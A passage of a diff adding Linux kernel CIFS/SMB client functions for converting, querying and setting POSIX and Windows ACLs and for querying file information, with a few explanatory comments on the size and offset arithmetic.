++		pACE = &cifs_acl->ace_array[0];
++		size = sizeof(struct cifs_posix_acl);
++		size += sizeof(struct cifs_posix_ace) * count;
++		/* check if we would go beyond end of SMB */
++		if (size_of_data_area < size) {
++			cifs_dbg(FYI, "bad CIFS POSIX ACL size %d vs. %d\n",
++				 size_of_data_area, size);
++			return -EINVAL;
++		}
++	} else if (acl_type == ACL_TYPE_DEFAULT) {
++		count = le16_to_cpu(cifs_acl->access_entry_count);
++		size = sizeof(struct cifs_posix_acl);
++		size += sizeof(struct cifs_posix_ace) * count;
++/* skip past access ACEs to get to default ACEs */
++		pACE = &cifs_acl->ace_array[count];
++		count = le16_to_cpu(cifs_acl->default_entry_count);
++		size += sizeof(struct cifs_posix_ace) * count;
++		/* check if we would go beyond end of SMB */
++		if (size_of_data_area < size)
++			return -EINVAL;
++	} else {
++		/* illegal type */
++		return -EINVAL;
++	}
++
++	size = posix_acl_xattr_size(count);
++	if ((buflen == 0) || (local_acl == NULL)) {
++		/* used to query ACL EA size */
++	} else if (size > buflen) {
++		return -ERANGE;
++	} else /* buffer big enough */ {
++		struct posix_acl_xattr_entry *ace = (void *)(local_acl + 1);
++
++		local_acl->a_version = cpu_to_le32(POSIX_ACL_XATTR_VERSION);
++		for (i = 0; i < count ; i++) {
++			cifs_convert_ace(&ace[i], pACE);
++			pACE++;
++		}
++	}
++	return size;
++}
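++
++/*
++ * Size arithmetic above, worked for an assumed access ACL of 3 ACEs:
++ * on the wire the ACL occupies sizeof(struct cifs_posix_acl) +
++ * 3 * sizeof(struct cifs_posix_ace) bytes, while the value returned
++ * to the caller is the local xattr size, posix_acl_xattr_size(3).
++ * A zero buflen (or NULL target buffer) still returns that xattr
++ * size, which is how callers probe for the required EA buffer size.
++ */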
++
++static void convert_ace_to_cifs_ace(struct cifs_posix_ace *cifs_ace,
++				     const struct posix_acl_xattr_entry *local_ace)
++{
++	cifs_ace->cifs_e_perm = le16_to_cpu(local_ace->e_perm);
++	cifs_ace->cifs_e_tag =  le16_to_cpu(local_ace->e_tag);
++	/* BB is there a better way to handle the large uid? */
++	if (local_ace->e_id == cpu_to_le32(-1)) {
++	/* Probably no need to le convert -1 on any arch but cannot hurt */
++		cifs_ace->cifs_uid = cpu_to_le64(-1);
++	} else
++		cifs_ace->cifs_uid = cpu_to_le64(le32_to_cpu(local_ace->e_id));
++/*
++	cifs_dbg(FYI, "perm %d tag %d id %d\n",
++		 ace->e_perm, ace->e_tag, ace->e_id);
++*/
++}
++
++/* Convert ACL from local Linux POSIX xattr to CIFS POSIX ACL wire format */
++static __u16 ACL_to_cifs_posix(char *parm_data, const char *pACL,
++			       const int buflen, const int acl_type)
++{
++	__u16 rc = 0;
++	struct cifs_posix_acl *cifs_acl = (struct cifs_posix_acl *)parm_data;
++	struct posix_acl_xattr_header *local_acl = (void *)pACL;
++	struct posix_acl_xattr_entry *ace = (void *)(local_acl + 1);
++	int count;
++	int i;
++
++	if ((buflen == 0) || (pACL == NULL) || (cifs_acl == NULL))
++		return 0;
++
++	count = posix_acl_xattr_count((size_t)buflen);
++	cifs_dbg(FYI, "setting acl with %d entries from buf of length %d and version of %d\n",
++		 count, buflen, le32_to_cpu(local_acl->a_version));
++	if (le32_to_cpu(local_acl->a_version) != 2) {
++		cifs_dbg(FYI, "unknown POSIX ACL version %d\n",
++			 le32_to_cpu(local_acl->a_version));
++		return 0;
++	}
++	cifs_acl->version = cpu_to_le16(1);
++	if (acl_type == ACL_TYPE_ACCESS) {
++		cifs_acl->access_entry_count = cpu_to_le16(count);
++		cifs_acl->default_entry_count = cpu_to_le16(0xFFFF);
++	} else if (acl_type == ACL_TYPE_DEFAULT) {
++		cifs_acl->default_entry_count = cpu_to_le16(count);
++		cifs_acl->access_entry_count = cpu_to_le16(0xFFFF);
++	} else {
++		cifs_dbg(FYI, "unknown ACL type %d\n", acl_type);
++		return 0;
++	}
++	for (i = 0; i < count; i++)
++		convert_ace_to_cifs_ace(&cifs_acl->ace_array[i], &ace[i]);
++	if (rc == 0) {
++		rc = (__u16)(count * sizeof(struct cifs_posix_ace));
++		rc += sizeof(struct cifs_posix_acl);
++		/* BB add check to make sure ACL does not overflow SMB */
++	}
++	return rc;
++}
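++
++/*
++ * For the converter above, the returned __u16 is the number of wire
++ * bytes written: with an assumed count of 3 entries it returns
++ * 3 * sizeof(struct cifs_posix_ace) + sizeof(struct cifs_posix_acl).
++ * A return of 0 signals failure (empty buffer, unknown ACL version,
++ * or unknown type) and makes CIFSSMBSetPosixACL below fail with
++ * -EOPNOTSUPP instead of sending a bogus ACL.
++ */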
++
++int
++CIFSSMBGetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
++		   const unsigned char *searchName,
++		   char *acl_inf, const int buflen, const int acl_type,
++		   const struct nls_table *nls_codepage, int remap)
++{
++/* SMB_QUERY_POSIX_ACL */
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In GetPosixACL (Unix) for path %s\n", searchName);
++
++queryAclRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		(void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++			cifsConvertToUTF16((__le16 *) pSMB->FileName,
++					   searchName, PATH_MAX, nls_codepage,
++					   remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++		pSMB->FileName[name_len] = 0;
++		pSMB->FileName[name_len+1] = 0;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, searchName);
++	}
++
++	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max data count below from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(4000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(
++		offsetof(struct smb_com_transaction2_qpi_req,
++			 InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_POSIX_ACL);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_acl_get);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in Query POSIX ACL = %d\n", rc);
++	} else {
++		/* decode response */
++
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		/* BB also check enough total bytes returned */
++		if (rc || get_bcc(&pSMBr->hdr) < 2)
++			rc = -EIO;      /* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
++			rc = cifs_copy_posix_acl(acl_inf,
++				(char *)&pSMBr->hdr.Protocol+data_offset,
++				buflen, acl_type, count);
++		}
++	}
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto queryAclRetry;
++	return rc;
++}
++
++int
++CIFSSMBSetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
++		   const unsigned char *fileName,
++		   const char *local_acl, const int buflen,
++		   const int acl_type,
++		   const struct nls_table *nls_codepage, int remap)
++{
++	struct smb_com_transaction2_spi_req *pSMB = NULL;
++	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
++	char *parm_data;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count, data_count, param_offset, offset;
++
++	cifs_dbg(FYI, "In SetPosixACL (Unix) for path %s\n", fileName);
++setAclRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++			cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
++					   PATH_MAX, nls_codepage, remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, fileName);
++	}
++	params = 6 + name_len;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB size from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	parm_data = ((char *) &pSMB->hdr.Protocol) + offset;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++
++	/* convert to on the wire format for POSIX ACL */
++	data_count = ACL_to_cifs_posix(parm_data, local_acl, buflen, acl_type);
++
++	if (data_count == 0) {
++		rc = -EOPNOTSUPP;
++		goto setACLerrorExit;
++	}
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_POSIX_ACL);
++	byte_count = 3 /* pad */  + params + data_count;
++	pSMB->DataCount = cpu_to_le16(data_count);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "Set POSIX ACL returned %d\n", rc);
++
++setACLerrorExit:
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto setAclRetry;
++	return rc;
++}
++
++int
++CIFSGetExtAttr(const unsigned int xid, struct cifs_tcon *tcon,
++	       const int netfid, __u64 *pExtAttrBits, __u64 *pMask)
++{
++	int rc = 0;
++	struct smb_t2_qfi_req *pSMB = NULL;
++	struct smb_t2_qfi_rsp *pSMBr = NULL;
++	int bytes_returned;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In GetExtAttr\n");
++	if (tcon == NULL)
++		return -ENODEV;
++
++GetExtAttrRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2 /* level */ + 2 /* fid */;
++	pSMB->t2.TotalDataCount = 0;
++	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
++	/* BB find exact max data count below from sess structure BB */
++	pSMB->t2.MaxDataCount = cpu_to_le16(4000);
++	pSMB->t2.MaxSetupCount = 0;
++	pSMB->t2.Reserved = 0;
++	pSMB->t2.Flags = 0;
++	pSMB->t2.Timeout = 0;
++	pSMB->t2.Reserved2 = 0;
++	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
++					       Fid) - 4);
++	pSMB->t2.DataCount = 0;
++	pSMB->t2.DataOffset = 0;
++	pSMB->t2.SetupCount = 1;
++	pSMB->t2.Reserved3 = 0;
++	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
++	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_ATTR_FLAGS);
++	pSMB->Pad = 0;
++	pSMB->Fid = netfid;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "error %d in GetExtAttr\n", rc);
++	} else {
++		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		/* BB also check enough total bytes returned */
++		if (rc || get_bcc(&pSMBr->hdr) < 2)
++			/* If rc, should we check for EOPNOTSUPP and
++			   disable the srvino flag? Or in the caller? */
++			rc = -EIO;      /* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
++			struct file_chattr_info *pfinfo;
++
++			if (count != 16) {
++				cifs_dbg(FYI, "Invalid size ret in GetExtAttr\n");
++				rc = -EIO;
++				goto GetExtAttrOut;
++			}
++			pfinfo = (struct file_chattr_info *)
++				 (data_offset + (char *) &pSMBr->hdr.Protocol);
++			*pExtAttrBits = le64_to_cpu(pfinfo->mode);
++			*pMask = le64_to_cpu(pfinfo->mask);
++		}
++	}
++GetExtAttrOut:
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto GetExtAttrRetry;
++	return rc;
++}
++
++#endif /* CONFIG_CIFS_POSIX */
++
++/*
++ * Initialize an NT TRANSACT SMB in a small smb request buffer.  This assumes
++ * that all NT TRANSACTs that we init here have total parm and data under
++ * about 400 bytes (so they fit in the small cifs buffer size), which has been
++ * the case so far.  NB: the setup words themselves, ByteCount, MaxSetupCount
++ * (size of the returned setup area) and MaxParameterCount (returned parms
++ * size) must be set by the caller.
++ */
++static int
++smb_init_nttransact(const __u16 sub_command, const int setup_count,
++		   const int parm_len, struct cifs_tcon *tcon,
++		   void **ret_buf)
++{
++	int rc;
++	__u32 temp_offset;
++	struct smb_com_ntransact_req *pSMB;
++
++	rc = small_smb_init(SMB_COM_NT_TRANSACT, 19 + setup_count, tcon,
++				(void **)&pSMB);
++	if (rc)
++		return rc;
++	*ret_buf = (void *)pSMB;
++	pSMB->Reserved = 0;
++	pSMB->TotalParameterCount = cpu_to_le32(parm_len);
++	pSMB->TotalDataCount  = 0;
++	pSMB->MaxDataCount = cpu_to_le32(CIFSMaxBufSize & 0xFFFFFF00);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->DataCount  = pSMB->TotalDataCount;
++	temp_offset = offsetof(struct smb_com_ntransact_req, Parms) +
++			(setup_count * 2) - 4 /* for rfc1001 length itself */;
++	pSMB->ParameterOffset = cpu_to_le32(temp_offset);
++	pSMB->DataOffset = cpu_to_le32(temp_offset + parm_len);
++	pSMB->SetupCount = setup_count; /* no need to le convert byte fields */
++	pSMB->SubCommand = cpu_to_le16(sub_command);
++	return 0;
++}
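++
++/*
++ * Offset arithmetic above, illustrated for the QUERY_SECURITY_DESC
++ * caller below (setup_count = 0, parm_len = 8): the parameter area
++ * starts at offsetof(struct smb_com_ntransact_req, Parms) - 4, where
++ * the 4 subtracts the RFC1001 length field that is not counted in
++ * SMB offsets, and the data area follows 8 bytes after it.
++ */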
++
++static int
++validate_ntransact(char *buf, char **ppparm, char **ppdata,
++		   __u32 *pparmlen, __u32 *pdatalen)
++{
++	char *end_of_smb;
++	__u32 data_count, data_offset, parm_count, parm_offset;
++	struct smb_com_ntransact_rsp *pSMBr;
++	u16 bcc;
++
++	*pdatalen = 0;
++	*pparmlen = 0;
++
++	if (buf == NULL)
++		return -EINVAL;
++
++	pSMBr = (struct smb_com_ntransact_rsp *)buf;
++
++	bcc = get_bcc(&pSMBr->hdr);
++	end_of_smb = 2 /* sizeof byte count */ + bcc +
++			(char *)&pSMBr->ByteCount;
++
++	data_offset = le32_to_cpu(pSMBr->DataOffset);
++	data_count = le32_to_cpu(pSMBr->DataCount);
++	parm_offset = le32_to_cpu(pSMBr->ParameterOffset);
++	parm_count = le32_to_cpu(pSMBr->ParameterCount);
++
++	*ppparm = (char *)&pSMBr->hdr.Protocol + parm_offset;
++	*ppdata = (char *)&pSMBr->hdr.Protocol + data_offset;
++
++	/* should we also check that parm and data areas do not overlap? */
++	if (*ppparm > end_of_smb) {
++		cifs_dbg(FYI, "parms start after end of smb\n");
++		return -EINVAL;
++	} else if (parm_count + *ppparm > end_of_smb) {
++		cifs_dbg(FYI, "parm end after end of smb\n");
++		return -EINVAL;
++	} else if (*ppdata > end_of_smb) {
++		cifs_dbg(FYI, "data starts after end of smb\n");
++		return -EINVAL;
++	} else if (data_count + *ppdata > end_of_smb) {
++		cifs_dbg(FYI, "data %p + count %d (%p) past smb end %p start %p\n",
++			 *ppdata, data_count, (data_count + *ppdata),
++			 end_of_smb, pSMBr);
++		return -EINVAL;
++	} else if (parm_count + data_count > bcc) {
++		cifs_dbg(FYI, "parm count and data count larger than SMB\n");
++		return -EINVAL;
++	}
++	*pdatalen = data_count;
++	*pparmlen = parm_count;
++	return 0;
++}
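++
++/*
++ * Bounds checking above, sketched with an assumed bcc of 100:
++ * end_of_smb then points 102 bytes past &pSMBr->ByteCount (2 for the
++ * byte count field itself plus the 100 data bytes).  A response whose
++ * claimed offsets put *ppdata + data_count beyond end_of_smb, or with
++ * parm_count + data_count > bcc, is rejected with -EINVAL before
++ * anything is copied out of it.
++ */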
++
++/* Get Security Descriptor (by handle) from remote server for a file or dir */
++int
++CIFSSMBGetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon, __u16 fid,
++		  struct cifs_ntsd **acl_inf, __u32 *pbuflen)
++{
++	int rc = 0;
++	int buf_type = 0;
++	QUERY_SEC_DESC_REQ *pSMB;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++
++	cifs_dbg(FYI, "GetCifsACL\n");
++
++	*pbuflen = 0;
++	*acl_inf = NULL;
++
++	rc = smb_init_nttransact(NT_TRANSACT_QUERY_SECURITY_DESC, 0,
++			8 /* parm len */, tcon, (void **) &pSMB);
++	if (rc)
++		return rc;
++
++	pSMB->MaxParameterCount = cpu_to_le32(4);
++	/* BB TEST with big acls that might need to be e.g. larger than 16K */
++	pSMB->MaxSetupCount = 0;
++	pSMB->Fid = fid; /* file handle always le */
++	pSMB->AclFlags = cpu_to_le32(CIFS_ACL_OWNER | CIFS_ACL_GROUP |
++				     CIFS_ACL_DACL);
++	pSMB->ByteCount = cpu_to_le16(11); /* 3 bytes pad + 8 bytes parm */
++	inc_rfc1001_len(pSMB, 11);
++	iov[0].iov_base = (char *)pSMB;
++	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
++
++	rc = SendReceive2(xid, tcon->ses, iov, 1 /* num iovec */, &buf_type,
++			  0, &rsp_iov);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_acl_get);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QuerySecDesc = %d\n", rc);
++	} else {                /* decode response */
++		__le32 *parm;
++		__u32 parm_len;
++		__u32 acl_len;
++		struct smb_com_ntransact_rsp *pSMBr;
++		char *pdata;
++
++/* validate_nttransact */
++		rc = validate_ntransact(rsp_iov.iov_base, (char **)&parm,
++					&pdata, &parm_len, pbuflen);
++		if (rc)
++			goto qsec_out;
++		pSMBr = (struct smb_com_ntransact_rsp *)rsp_iov.iov_base;
++
++		cifs_dbg(FYI, "smb %p parm %p data %p\n",
++			 pSMBr, parm, *acl_inf);
++
++		if (le32_to_cpu(pSMBr->ParameterCount) != 4) {
++			rc = -EIO;      /* bad smb */
++			*pbuflen = 0;
++			goto qsec_out;
++		}
++
++/* BB check that data area is minimum length and as big as acl_len */
++
++		acl_len = le32_to_cpu(*parm);
++		if (acl_len != *pbuflen) {
++			cifs_dbg(VFS, "acl length %d does not match %d\n",
++				 acl_len, *pbuflen);
++			if (*pbuflen > acl_len)
++				*pbuflen = acl_len;
++		}
++
++		/* check if buffer is big enough for the acl
++		   header followed by the smallest SID */
++		if ((*pbuflen < sizeof(struct cifs_ntsd) + 8) ||
++		    (*pbuflen >= 64 * 1024)) {
++			cifs_dbg(VFS, "bad acl length %d\n", *pbuflen);
++			rc = -EINVAL;
++			*pbuflen = 0;
++		} else {
++			*acl_inf = kmemdup(pdata, *pbuflen, GFP_KERNEL);
++			if (*acl_inf == NULL) {
++				*pbuflen = 0;
++				rc = -ENOMEM;
++			}
++		}
++	}
++qsec_out:
++	free_rsp_buf(buf_type, rsp_iov.iov_base);
++	return rc;
++}
++
++int
++CIFSSMBSetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon, __u16 fid,
++			struct cifs_ntsd *pntsd, __u32 acllen, int aclflag)
++{
++	__u16 byte_count, param_count, data_count, param_offset, data_offset;
++	int rc = 0;
++	int bytes_returned = 0;
++	SET_SEC_DESC_REQ *pSMB = NULL;
++	void *pSMBr;
++
++setCifsAclRetry:
++	rc = smb_init(SMB_COM_NT_TRANSACT, 19, tcon, (void **) &pSMB, &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++
++	param_count = 8;
++	param_offset = offsetof(struct smb_com_transaction_ssec_req, Fid) - 4;
++	data_count = acllen;
++	data_offset = param_offset + param_count;
++	byte_count = 3 /* pad */  + param_count;
++
++	pSMB->DataCount = cpu_to_le32(data_count);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->MaxParameterCount = cpu_to_le32(4);
++	pSMB->MaxDataCount = cpu_to_le32(16384);
++	pSMB->ParameterCount = cpu_to_le32(param_count);
++	pSMB->ParameterOffset = cpu_to_le32(param_offset);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->DataOffset = cpu_to_le32(data_offset);
++	pSMB->SetupCount = 0;
++	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_SET_SECURITY_DESC);
++	pSMB->ByteCount = cpu_to_le16(byte_count+data_count);
++
++	pSMB->Fid = fid; /* file handle always le */
++	pSMB->Reserved2 = 0;
++	pSMB->AclFlags = cpu_to_le32(aclflag);
++
++	if (pntsd && acllen) {
++		memcpy((char *)pSMBr + offsetof(struct smb_hdr, Protocol) +
++				data_offset, pntsd, acllen);
++		inc_rfc1001_len(pSMB, byte_count + data_count);
++	} else
++		inc_rfc1001_len(pSMB, byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++
++	cifs_dbg(FYI, "SetCIFSACL bytes_returned: %d, rc: %d\n",
++		 bytes_returned, rc);
++	if (rc)
++		cifs_dbg(FYI, "Set CIFS ACL returned %d\n", rc);
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto setCifsAclRetry;
++
++	return rc;
++}
++
++
++/* Legacy Query Path Information call for lookup to old servers such
++   as Win9x/WinME */
++int
++SMBQueryInformation(const unsigned int xid, struct cifs_tcon *tcon,
++		    const char *search_name, FILE_ALL_INFO *data,
++		    const struct nls_table *nls_codepage, int remap)
++{
++	QUERY_INFORMATION_REQ *pSMB;
++	QUERY_INFORMATION_RSP *pSMBr;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++
++	cifs_dbg(FYI, "In SMBQPath path %s\n", search_name);
++QInfRetry:
++	rc = smb_init(SMB_COM_QUERY_INFORMATION, 0, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++			cifsConvertToUTF16((__le16 *) pSMB->FileName,
++					   search_name, PATH_MAX, nls_codepage,
++					   remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, search_name);
++	}
++	pSMB->BufferFormat = 0x04;
++	name_len++; /* account for buffer type byte */
++	inc_rfc1001_len(pSMB, (__u16)name_len);
++	pSMB->ByteCount = cpu_to_le16(name_len);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QueryInfo = %d\n", rc);
++	} else if (data) {
++		struct timespec64 ts;
++		__u32 time = le32_to_cpu(pSMBr->last_write_time);
++
++		/* decode response */
++		/* BB FIXME - add time zone adjustment BB */
++		memset(data, 0, sizeof(FILE_ALL_INFO));
++		ts.tv_nsec = 0;
++		ts.tv_sec = time;
++		/* decode time fields */
++		data->ChangeTime = cpu_to_le64(cifs_UnixTimeToNT(ts));
++		data->LastWriteTime = data->ChangeTime;
++		data->LastAccessTime = 0;
++		data->AllocationSize =
++			cpu_to_le64(le32_to_cpu(pSMBr->size));
++		data->EndOfFile = data->AllocationSize;
++		data->Attributes =
++			cpu_to_le32(le16_to_cpu(pSMBr->attr));
++	} else
++		rc = -EIO; /* bad buffer passed in */
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QInfRetry;
++
++	return rc;
++}
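++
++/*
++ * The time handling above relies on cifs_UnixTimeToNT(), which
++ * converts seconds since the Unix epoch (1970) into NT time, i.e.
++ * 100-nanosecond intervals since 1601.  As a worked example, a
++ * last_write_time of 0 (the Unix epoch itself) maps to
++ * 11644473600 * 10000000 NT units, the span between the two epochs.
++ */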
++
++int
++CIFSSMBQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		 u16 netfid, FILE_ALL_INFO *pFindData)
++{
++	struct smb_t2_qfi_req *pSMB = NULL;
++	struct smb_t2_qfi_rsp *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	__u16 params, byte_count;
++
++QFileInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2 /* level */ + 2 /* fid */;
++	pSMB->t2.TotalDataCount = 0;
++	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
++	/* BB find exact max data count below from sess structure BB */
++	pSMB->t2.MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
++	pSMB->t2.MaxSetupCount = 0;
++	pSMB->t2.Reserved = 0;
++	pSMB->t2.Flags = 0;
++	pSMB->t2.Timeout = 0;
++	pSMB->t2.Reserved2 = 0;
++	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
++					       Fid) - 4);
++	pSMB->t2.DataCount = 0;
++	pSMB->t2.DataOffset = 0;
++	pSMB->t2.SetupCount = 1;
++	pSMB->t2.Reserved3 = 0;
++	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
++	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_ALL_INFO);
++	pSMB->Pad = 0;
++	pSMB->Fid = netfid;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QFileInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc) /* BB add auto retry on EOPNOTSUPP? */
++			rc = -EIO;
++		else if (get_bcc(&pSMBr->hdr) < 40)
++			rc = -EIO;	/* bad smb */
++		else if (pFindData) {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			memcpy((char *) pFindData,
++			       (char *) &pSMBr->hdr.Protocol +
++			       data_offset, sizeof(FILE_ALL_INFO));
++		} else
++			rc = -ENOMEM;
++	}
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto QFileInfoRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		 const char *search_name, FILE_ALL_INFO *data,
++		 int legacy /* old style infolevel */,
++		 const struct nls_table *nls_codepage, int remap)
++{
++	/* level 263 SMB_QUERY_FILE_ALL_INFO */
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	__u16 params, byte_count;
++
++	/* cifs_dbg(FYI, "In QPathInfo path %s\n", search_name); */
++QPathInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, search_name,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, search_name);
++	}
++
++	params = 2 /* level */ + 4 /* reserved */ + name_len /* includes NUL */;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
